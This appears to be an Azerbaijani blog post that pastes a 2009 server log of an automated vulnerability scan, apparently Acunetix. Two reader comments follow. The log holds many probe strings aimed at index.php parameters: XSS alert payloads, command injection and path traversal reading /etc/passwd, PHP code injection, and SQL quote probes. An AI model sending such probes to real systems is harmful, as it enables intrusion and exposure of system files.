20:11:2009 11:45:01 ==> index.php?sec=alert(1264043128)%3B&id=10
20:11:2009 11:45:02 ==> index.php?sec=comment&id=alert(1309039059)%3B
20:11:2009 11:45:02 ==> index.php?sec=comment&id=alert(990974244)%3B
20:11:2009 11:45:02 ==> index.php?sec=alert(1891836562)%3B&mid=10
20:11:2009 11:45:02 ==> index.php?sec=alert(37731041)%3B&mid=10
20:11:2009 11:45:02 ==> index.php?sec=comment&mid=alert(1319841385)%3B
20:11:2009 11:45:03 ==> index.php?sec=comment&mid=alert(1946218088)%3B
20:11:2009 11:45:04 ==> index.php?sec=comment&id=alert(634206813)%3B
20:11:2009 11:45:05 ==> index.php?sec=cat+/etc/passwd&id=10
20:11:2009 11:45:05 ==> index.php?sec=comment&id=cat+/etc/passwd
20:11:2009 11:45:05 ==> index.php?sec=comment&id=cat+/etc/passwd
20:11:2009 11:45:05 ==> index.php?sec=comment&id=cat+/etc/passwd
20:11:2009 11:45:05 ==> index.php?sec=comment&mid=alert(345690644)%3B
20:11:2009 11:45:06 ==> index.php?sec=cat+/etc/passwd&mid=10
20:11:2009 11:45:06 ==> index.php?sec=cat+/etc/passwd&mid=10
20:11:2009 11:45:06 ==> index.php?sec=comment&mid=cat+/etc/passwd
20:11:2009 11:45:06 ==> index.php?sec=comment&mid=cat+/etc/passwd
20:11:2009 11:45:06 ==> index.php?sec=comment&mid=cat+/etc/passwd
20:11:2009 11:45:10 ==> index.php?sec=comment&id=.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
20:11:2009 11:45:10 ==> index.php?sec=comment&id=.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
20:11:2009 11:45:11 ==> index.php?sec=.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&mid=10
20:11:2009 11:45:11 ==> index.php?sec=comment&mid=.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
20:11:2009 11:45:11 ==> index.php?sec=.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&mid=10
20:11:2009 11:45:11 ==> index.php?sec=comment&mid=.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
20:11:2009 11:45:11 ==> index.php?sec=comment&mid=.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
20:11:2009 11:45:13 ==> index.php?sec=.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&id=10
20:11:2009 11:45:14 ==> index.php?sec=comment&id=.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
20:11:2009 11:45:45 ==> index.php?sec="%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:45:46 ==> index.php?sec="%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//&id=10
20:11:2009 11:45:46 ==> index.php?sec="%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//&id=10
20:11:2009 11:45:46 ==> index.php?sec=comment&id="%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:45:46 ==> index.php?sec=comment&id="%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:45:46 ==> index.php?sec=%3Bcat+/etc/passwd%3B
20:11:2009 11:45:47 ==> index.php?sec=%3Bcat+/etc/passwd%3B
20:11:2009 11:45:47 ==> index.php?sec=%3Bcat+/etc/passwd%3B&id=10
20:11:2009 11:45:47 ==> index.php?sec=comment&id=%3Bcat+/etc/passwd%3B
20:11:2009 11:45:47 ==> index.php?sec=comment&id=%3Bcat+/etc/passwd%3B
20:11:2009 11:45:48 ==> index.php?sec=comment&id=%3Bcat+/etc/passwd%3B
20:11:2009 11:45:48 ==> index.php?sec="%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:45:48 ==> index.php?sec=comment&id="%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:45:49 ==> index.php?sec=%3Bcat+/etc/passwd%3B&id=10
20:11:2009 11:45:51 ==> index.php?sec=alert(1647824866)%3B
20:11:2009 11:45:51 ==> index.php?sec=alert(1298423153)%3B
20:11:2009 11:45:51 ==> index.php?sec=alert(124072484)%3B&id=10
20:11:2009 11:45:51 ==> index.php?sec=alert(201133753)%3B&id=10
20:11:2009 11:45:51 ==> index.php?sec=comment&id=alert(2035609503)%3B
20:11:2009 11:45:52 ==> index.php?sec=comment&id=alert(752920738)%3B
20:11:2009 11:45:52 ==> index.php?sec=/etc/passwd
20:11:2009 11:45:52 ==> index.php?sec=/etc/passwd&id=10
20:11:2009 11:45:52 ==> index.php?sec=/etc/passwd&id=10
20:11:2009 11:45:53 ==> index.php?sec=comment&id=/etc/passwd
20:11:2009 11:45:55 ==> index.php?sec=comment&id=alert(657927712)%3B
20:11:2009 11:45:55 ==> index.php?sec=/etc/passwd
20:11:2009 11:45:55 ==> index.php?sec=comment&id=/etc/passwd
20:11:2009 11:45:55 ==> index.php?sec=comment&id=/etc/passwd
20:11:2009 11:45:57 ==> index.php?sec='"
20:11:2009 11:45:58 ==> index.php?sec='"&id=10
20:11:2009 11:46:00 ==> index.php?sec='"
20:11:2009 11:46:12 ==> index.php?sec='"&id=10
20:11:2009 11:46:12 ==> index.php?sec=comment&id='"
20:11:2009 11:46:13 ==> index.php?sec=comment&id='"
20:11:2009 11:46:13 ==> index.php?sec=comment&id='"
20:11:2009 11:46:13 ==> index.php?sec=comment&mid='"
20:11:2009 11:46:13 ==> index.php?sec=comment&mid='"
20:11:2009 11:46:14 ==> index.php?sec="%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//&mid=10
20:11:2009 11:46:14 ==> index.php?sec=comment&mid="%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:46:14 ==> index.php?sec=comment&mid="%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:46:14 ==> index.php?sec=comment&mid="%3Bprintf(md5(acunetix_wvs_security_test))%3Bexit%3B//
20:11:2009 11:46:16 ==> index.php?sec='"&mid=10
20:11:2009 11:46:16 ==> index.php?sec='"&mid=10
20:11:2009 11:46:16 ==> index.php?sec=comment&mid='"
20:11:2009 11:46:16 ==> index.php?sec=alert(802769086)%3B&mid=10
20:11:2009 11:46:16 ==> index.php?sec=alert(850699704)%3B&mid=10
20:11:2009 11:46:16 ==> index.php?sec=comment&mid=alert(415408285)%3B
20:11:2009 11:46:17 ==> index.php?sec=comment&mid=alert(608308580)%3B
20:11:2009 11:46:17 ==> index.php?sec=-->alert(1664468178)%3B
20:11:2009 11:46:17 ==> index.php?sec=-->alert(1814423073)%3B
20:11:2009 11:46:17 ==> index.php?sec=-->alert(1930890068)%3B&id=10
20:11:2009 11:46:17 ==> index.php?sec=%3Bcat+/etc/passwd%3B&mid=10
20:11:2009 11:46:17 ==> index.php?sec=%3Bcat+/etc/passwd%3B&mid=10
20:11:2009 11:46:17 ==> index.php?sec=comment&mid=%3Bcat+/etc/passwd%3B
20:11:2009 11:46:18 ==> index.php?sec=comment&mid=%3Bcat+/etc/passwd%3B
20:11:2009 11:46:18 ==> index.php?sec=comment&mid=%3Bcat+/etc/passwd%3B
20:11:2009 11:46:18 ==> index.php?sec=%7Ccat+/etc/passwd
20:11:2009 11:46:18 ==> index.php?sec=%7Ccat+/etc/passwd
20:11:2009 11:46:18 ==> index.php?sec=%7Ccat+/etc/passwd&id=10
20:11:2009 11:46:19 ==> index.php?sec=comment&mid=alert(1200249107)%3B
20:11:2009 11:46:20 ==> index.php?sec=/etc/passwd&mid=10
20:11:2009 11:46:20 ==> index.php?sec=comment&mid=/etc/passwd
20:11:2009 11:46:20 ==> index.php?sec=comment&mid=/etc/passwd
20:11:2009 11:46:20 ==> index.php?sec=comment&mid=/etc/passwd
20:11:2009 11:46:20 ==> index.php?sec=alert(1694625747)%3B&id=10
20:11:2009 11:46:55 ==> index.php?sec=comment&id=\'
20:11:2009 11:46:55 ==> index.php?sec=comment&id=\'
20:11:2009 11:46:55 ==> index.php?sec=%7Ccat+/etc/passwd&id=10
20:11:2009 11:46:56 ==> index.php?sec=comment&id=-->alert(1377482449)%3B
20:11:2009 11:46:56 ==> index.php?sec=%7Ccat+/etc/passwd&mid=10
20:11:2009 11:46:56 ==> index.php?sec=-->alert(1040903300)%3B&mid=10
20:11:2009 11:46:57 ==> index.php?sec=-->alert(1683174040)%3B&mid=10
20:11:2009 11:46:57 ==> index.php?sec=comment&mid=%7Ccat+/etc/passwd
20:11:2009 11:46:57 ==> index.php?sec=comment&mid=%7Ccat+/etc/passwd
20:11:2009 11:46:57 ==> index.php?sec=comment&mid=-->alert(1015227135)%3B
20:11:2009 11:46:57 ==> index.php?sec=comment&mid=-->alert(1687924479)%3B
20:11:2009 11:46:57 ==> index.php?sec=comment&mid=-->alert(961195266)%3B
20:11:2009 11:46:59 ==> index.php?sec=comment&id=-->alert(1199858114)%3B
20:11:2009 11:47:01 ==> index.php?sec=alert(458703142)%3B
20:11:2009 11:47:10 ==> index.php?sec=comment&id=t>
20:11:2009 11:49:31 ==> index.php?sec=t>&id=10
20:11:2009 11:49:31 ==> index.php?sec=comment&id=t>
20:11:2009 11:49:32 ==> index.php?sec=comment&id=t>
20:11:2009 11:49:33 ==> index.php?sec=t>
20:11:2009 11:49:34 ==> index.php?sec=comment&id=t>
20:11:2009 11:49:40 ==> index.php?sec=t>&id=10
20:11:2009 11:49:44 ==> index.php?sec=t>&mid=10
20:11:2009 11:49:44 ==> index.php?sec=t>&mid=10
20:11:2009 11:49:44 ==> index.php?sec=comment&mid=t>
20:11:2009 11:49:44 ==> index.php?sec=comment&mid=t>
20:11:2009 11:49:44 ==> index.php?sec=comment&mid=t>
20:11:2009 11:49:45 ==> index.php?sec=
20:11:2009 11:49:45 ==> index.php?sec=
20:11:2009 11:49:48 ==> index.php?sec=
&id=10
20:11:2009 11:49:54 ==> index.php?sec=
&id=10
20:11:2009 11:49:54 ==> index.php?sec=comment&id=
20:11:2009 11:49:54 ==> index.php?sec=comment&id=
20:11:2009 11:49:54 ==> index.php?sec=comment&id=
20:11:2009 11:49:54 ==> index.php?sec=
&mid=10
20:11:2009 11:49:54 ==> index.php?sec=
&mid=10
20:11:2009 11:49:55 ==> index.php?sec=comment&mid=
20:11:2009 11:49:55 ==> index.php?sec=comment&mid=
20:11:2009 11:49:55 ==> index.php?sec=comment&mid=
20:11:2009 11:49:58 ==> index.php?sec=
20:11:2009 11:49:58 ==> index.php?sec=
20:11:2009 11:49:58 ==> index.php?sec=&id=10
20:11:2009 11:49:59 ==> index.php?sec=comment&id=
20:11:2009 11:49:59 ==> index.php?sec=comment&id=
20:11:2009 11:49:59 ==> index.php?sec=comment&id=
20:11:2009 11:50:01 ==> index.php?sec=&id=10
20:11:2009 11:50:08 ==> index.php?sec=comment&mid=
20:11:2009 11:50:09 ==> index.php?sec=&mid=10
20:11:2009 11:50:09 ==> index.php?sec=comment&mid=
20:11:2009 11:50:09 ==> index.php?sec=&mid=10
20:11:2009 11:50:09 ==> index.php?sec=comment&mid=
20:11:2009 11:50:09 ==> index.php?sec=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%281926425892%29%3B%22%3E
20:11:2009 11:50:09 ==> index.php?sec=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%28361887675%29%3B%22%3E
20:11:2009 11:50:09 ==> index.php?sec=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%281529271134%29%3B%22%3E&id=10
20:11:2009 11:50:13 ==> index.php?sec=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%281814278600%29%3B%22%3E&id=10
20:11:2009 11:50:14 ==> index.php?sec=comment&id=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%28372049778%29%3B%22%3E
20:11:2009 11:50:15 ==> index.php?sec=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%281676866621%29%3B%22%3E&mid=10
20:11:2009 11:50:16 ==> index.php?sec=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%281268694325%29%3B%22%3E&mid=10
20:11:2009 11:50:16 ==> index.php?sec=comment&id=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%281588223727%29%3B%22%3E
20:11:2009 11:50:16 ==> index.php?sec=comment&mid=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%282090188884%29%3B%22%3E
20:11:2009 11:50:17 ==> index.php?sec=comment&mid=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%281422186411%29%3B%22%3E
20:11:2009 11:50:17 ==> index.php?sec=comment&id=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%28700947120%29%3B%22%3E
20:11:2009 11:50:25 ==> index.php?sec=comment&mid=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%281901972496%29%3B%22%3E
20:11:2009 11:50:30 ==> index.php?sec=&id=10
20:11:2009 11:50:30 ==> index.php?sec=
20:11:2009 11:50:32 ==> index.php?sec=
20:11:2009 11:50:32 ==> index.php?sec=&id=10
20:11:2009 11:50:32 ==> index.php?sec=comment&id=
20:11:2009 11:50:33 ==> index.php?sec=comment&id=
20:11:2009 11:50:33 ==> index.php?sec=comment&id=
20:11:2009 11:50:38 ==> index.php?sec=&mid=10
20:11:2009 11:50:38 ==> index.php?sec=&mid=10
20:11:2009 11:50:38 ==> index.php?sec=comment&mid=
20:11:2009 11:50:38 ==> index.php?sec=
20:11:2009 11:50:41 ==> index.php?sec=comment&mid=
20:11:2009 11:50:41 ==> index.php?sec=
20:11:2009 11:51:07 ==> index.php?sec=
20:11:2009 11:51:07 ==> index.php?sec=comment&id=
20:11:2009 11:51:08 ==> index.php?sec=comment&id=
20:11:2009 11:51:08 ==> index.php?sec=comment&id=
20:11:2009 11:51:10 ==> index.php?sec=&id=10
20:11:2009 11:51:10 ==> index.php?sec=&id=10
20:11:2009 11:51:13 ==> index.php?sec=comment&mid=
20:11:2009 11:51:13 ==> index.php?sec=
20:11:2009 11:51:13 ==> index.php?sec=comment&mid=
20:11:2009 11:51:13 ==> index.php?sec=
20:11:2009 11:51:13 ==> index.php?sec=&mid=10
20:11:2009 11:51:13 ==> index.php?sec=comment&mid=
20:11:2009 11:51:16 ==> index.php?sec=&mid=10
20:11:2009 11:51:16 ==> index.php?sec=&id=10
20:11:2009 11:51:18 ==> index.php?sec=comment&id=
20:11:2009 11:51:18 ==> index.php?sec=&mid=10
20:11:2009 11:51:18 ==> index.php?sec=&id=10
20:11:2009 11:51:18 ==> index.php?sec=comment&id=
20:11:2009 11:51:18 ==> index.php?sec=&mid=10
20:11:2009 11:51:19 ==> index.php?sec=comment&mid=
20:11:2009 11:51:19 ==> index.php?sec=comment&mid=
20:11:2009 11:51:21 ==> index.php?sec=comment&id=
20:11:2009 11:51:21 ==> index.php?sec=comment&mid=
20:11:2009 11:51:32 ==> index.php?sec=
20:11:2009 11:51:32 ==> index.php?sec=
20:11:2009 11:51:32 ==> index.php?sec=comment&id=
20:11:2009 11:51:32 ==> index.php?sec=comment&id=
20:11:2009 11:51:32 ==> index.php?sec=&id=10
20:11:2009 11:51:33 ==> index.php?sec=&id=10
20:11:2009 11:51:35 ==> index.php?sec=comment&id=
20:11:2009 11:51:40 ==> index.php?sec=&mid=10
20:11:2009 11:51:40 ==> index.php?sec=&mid=10
20:11:2009 11:51:41 ==> index.php?sec=comment&mid=
20:11:2009 11:51:42 ==> index.php?sec=comment&mid=
20:11:2009 11:51:42 ==> index.php?sec= 20:11:2009 11:51:42 ==> index.php?sec=&id=10
20:11:2009 11:51:43 ==> index.php?sec=comment&mid=
20:11:2009 11:51:45 ==> index.php?sec= 20:11:2009 11:51:47 ==> index.php?sec=comment&id=
20:11:2009 11:51:47 ==> index.php?sec=comment&id= 20:11:2009 11:51:47 ==> index.php?sec=comment&id=
20:11:2009 11:51:48 ==> index.php?sec=comment&mid= 20:11:2009 11:51:48 ==> index.php?sec=&mid=10
20:11:2009 11:51:48 ==> index.php?sec=comment&mid= 20:11:2009 11:51:51 ==> index.php?sec=&id=10
20:11:2009 11:51:51 ==> index.php?sec=comment&mid= 20:11:2009 11:51:51 ==> index.php?sec=&mid=10
20:11:2009 11:51:56 ==> index.php?sec=
20:11:2009 11:51:56 ==> index.php?sec=&id=10
20:11:2009 11:51:56 ==> index.php?sec=comment&id=
20:11:2009 11:51:56 ==> index.php?sec=comment&id=
20:11:2009 11:51:57 ==> index.php?sec=comment&id=
20:11:2009 11:52:02 ==> index.php?sec=&id=10
20:11:2009 11:52:04 ==> index.php?sec=
20:11:2009 11:52:18 ==> index.php?sec=&mid=10
20:11:2009 11:52:18 ==> index.php?sec=&mid=10
20:11:2009 11:52:18 ==> index.php?sec=comment&mid=
20:11:2009 11:52:18 ==> index.php?sec=comment&mid=
20:11:2009 11:52:19 ==> index.php?sec='+style='background:url(JaVaScRiPt:alert(683901356))'+invalidparam='
20:11:2009 11:52:19 ==> index.php?sec='+style='background:url(JaVaScRiPt:alert(202537566))'+invalidparam='
20:11:2009 11:52:19 ==> index.php?sec='+style='background:url(JaVaScRiPt:alert(141299017))'+invalidparam='&id=10

Filed under: Ordan-burdan

2 Comments Leave a Comment

  • 1. ALoR  |  November 27, 2009 at 16:08

    :) he programdi, XSS ve SQL INJECTION yoxlayib :) hamisi ugursuz olub, men bele fikirleshirem ki, botlar var netde olan saytlarda xss, sql yoxlayir avtomatik. yoxsa bir bir el ile bu qeder sheylei elemek cetinki :) veya kimse azerbaycanli programla proxy ip ile edib. :) maraglidir teshekkur, bunun kimi cehdler http://www.azdefacers.org`a gunde 100-den chox bash verir hetta loglara choxdandir baxmirdim baxanda 20-minden chox cehd qeyde alinmisdi :)

  • 2. Eldar  |  December 10, 2009 at 16:44

    acunetix saytindaki programi bir defe hanisa saytda gorub yuklemisdim, ama istifade qaydasi sehv verildiyinden bu programin lazimsiz oldugunu fikirlesib sildim :(
    Ozu de mende dial-up-di bir de heves yoxdu eyni seyi yuklemeye.

Leave a Comment

(required)

(required), (Hidden)

XHTML: You can use these tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

TrackBack URL  |  RSS feed for comments on this post.

Bölmələr

Arxiv

Links

Tags

Social me